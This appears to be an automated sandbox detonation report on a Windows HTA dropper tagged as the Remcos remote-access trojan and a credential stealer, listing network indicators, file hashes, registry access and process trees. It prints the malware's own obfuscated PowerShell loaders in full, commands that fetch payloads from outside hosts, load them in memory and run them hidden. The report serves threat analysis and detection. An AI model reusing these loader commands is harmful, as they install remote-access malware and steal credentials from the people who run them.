⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀OgBw㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀FI㆛ ⺞ ⏬ ⦦ ⼀ZQBn㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀cwBt㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQBz㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀Jw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀B9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀fQ㆛ ⺞ ⏬ ⦦ ⼀=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('㆛ ⺞ ⏬ ⦦ ⼀','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MKNS/02/741.901.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"

Network

Country Destination Domain Proto
US 192.3.109.147:80 192.3.109.147 tcp
US 8.8.8.8:53 servidorwindows.ddns.com.br udp
BR 191.55.76.236:80 servidorwindows.ddns.com.br tcp

Files

\??\c:\Users\Admin\AppData\Local\Temp\yxua9fxg.cmdline

MD5 fca40b96b75cf53516080169d5805570
SHA1 23ae999d5aba82f46a33e81b18fc4f97378f7ddb
SHA256 aedd61689cc500298427330c75f2610e24fafb34aca223eceb326ae962200261
SHA512 3093ebd4b04cbd523e9b22e7e77335a8d5c1e2d7d8590884bf11169f9907658cd96f8bb39dac6c8f602c1a97ed191c16852fce9c0c6c9079b65da9318cce60c2

\??\c:\Users\Admin\AppData\Local\Temp\yxua9fxg.0.cs

MD5 4e9de40112f74a35c04e70ff765bd2d9
SHA1 e1b87ff8213b319bd6dc8a34c6753a0891b080c3
SHA256 1f50f29e22249d0a44023ab9bf900cfb9749cb222541f6fe7b81a9eebc971dfc
SHA512 bf910e45a2fa3fc6790dd7a3b930fd2b24964af2e3cbd049df1da73ad271967731c7b8a8f29d89d542071a80e0388c0e12130b24d606a55da955f838effa931e

\??\c:\Users\Admin\AppData\Local\Temp\CSCBA4A.tmp

MD5 e1037e65e0f70f630fc5febcdd737396
SHA1 f2527aa22973710cebc26039cd93f11e29edebdc
SHA256 772d200545be556742f92f33ec8199b9eafeb71db37cb0edfa8afffb8f66bdd3
SHA512 ad314463fb830f1e89428314d6d1b512a409fe6989927fe3f1af38f389164bc75fa8b170e207e8039fc15386f69d2339c7f8dcd782b3c34a6145b5184d4e048d

C:\Users\Admin\AppData\Local\Temp\RESBA4B.tmp

MD5 62403f81170733fbe273650425fe0344
SHA1 be9f31a48bfbd21521fdccd50adc87b0b6cea56f
SHA256 124b7fab74c8d1c1be702dee8e07022e18526ba98e037b7650e9e725295c15ce
SHA512 91bf07a32bb9b7ad725590314c095a1526d67bb7a4a52971155231f56e353011e6a601768bc10eed566bfd4b9f5afa6c443a6e139bc36f51e613b5f8a150d11a

C:\Users\Admin\AppData\Local\Temp\yxua9fxg.dll

MD5 f35ac81cb7e8b3dc43e3496c3280731d
SHA1 1944e69634b34a81bc1ada84ddbf61fa1d311b32
SHA256 50fce1a5e4655f3a97bce81040e041d94353b1d2532b90aa35f9d3982978809c
SHA512 e4f6a9993485a07d67de2b5e3cb6b6d0d6382546ce889810f1fde89c3940318d5eb861efc076d8eb9f1e00203a2a455c3bda615b8e1057900c0e8811d39fd6a4

C:\Users\Admin\AppData\Local\Temp\yxua9fxg.pdb

MD5 95981cc296a689cbdb4bf8d23e17f722
SHA1 43037d732984ab5ff4185c7a655a6dc21a6f4491
SHA256 c70410c64f75c92fbca4ba9f7dd6755d15eaf2329eace9e7c250a804f76e6b37
SHA512 107b557944bbfe07aeb9e577f95575e0ef98c3ac818732e57c17aff3741954ab01f0077909b5bae5a8ff9093c7685f2da2601d915d1d368bbcf52a1cf8b27598

C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS

MD5 bbb5526e4329ba09ff5e50938cacf20f
SHA1 3ad1ef94e2ffbe311f3d9017c2f3781d00869951
SHA256 700af46841a34b035ee7431fd07fe6bbd13651c58a704aed14df47cd74ce76ac
SHA512 5919fa788df8b2398078be672ea05a97fa273a4a0dceb8f96d5ba53b336567aeb7132a11ce99ecac7d763c1cb8ddfd2fefaf9607d74885b5927bcaf5de4b4d14

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 c7adcde7ad8cc6e2e52214a29c1c1981
SHA1 ebb987fd2bb0005cd066ddcbf2063d6436729e04
SHA256 366b958f266073bb080a763e0b08afcd1e56845b6a0be3639a5e56c3a61a6e39
SHA512 2d85b75697d57776a6b2e1c92dbca90bbc0b163308ec05e80341da2a706f5fa1e0036d97b9f369ebef0d066eba2155ab685a86211363461cf61da354c02cbeb6

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 20:55

Reported

2024-08-06 20:57

Platform

win10v2004-20240802-en

Max time kernel

148s

Max time network

144s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\INETHTMLPAGE.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Remcos

rat remcos

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1740 wrote to memory of 2044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2044 wrote to memory of 4284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 4284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 4284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 4844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4284 wrote to memory of 4844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4284 wrote to memory of 4844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4844 wrote to memory of 2512 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4844 wrote to memory of 2512 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4844 wrote to memory of 2512 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4284 wrote to memory of 948 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 4284 wrote to memory of 948 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 4284 wrote to memory of 948 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 948 wrote to memory of 220 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 220 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 220 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 220 wrote to memory of 2720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 220 wrote to memory of 2720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 220 wrote to memory of 2720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2720 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2720 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2720 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2720 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2720 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2720 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2720 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2720 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2720 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2720 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2720 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1648 wrote to memory of 2160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1648 wrote to memory of 2160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1648 wrote to memory of 2160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1648 wrote to memory of 2160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1648 wrote to memory of 4908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1648 wrote to memory of 4908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1648 wrote to memory of 4908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1648 wrote to memory of 4908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1648 wrote to memory of 2448 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1648 wrote to memory of 2448 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1648 wrote to memory of 2448 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1648 wrote to memory of 2448 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\INETHTMLPAGE.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1gtdujx5\1gtdujx5.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD254.tmp" "c:\Users\Admin\AppData\Local\Temp\1gtdujx5\CSC753D5C0F1284F02B1C3A2396961AB97.TMP"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

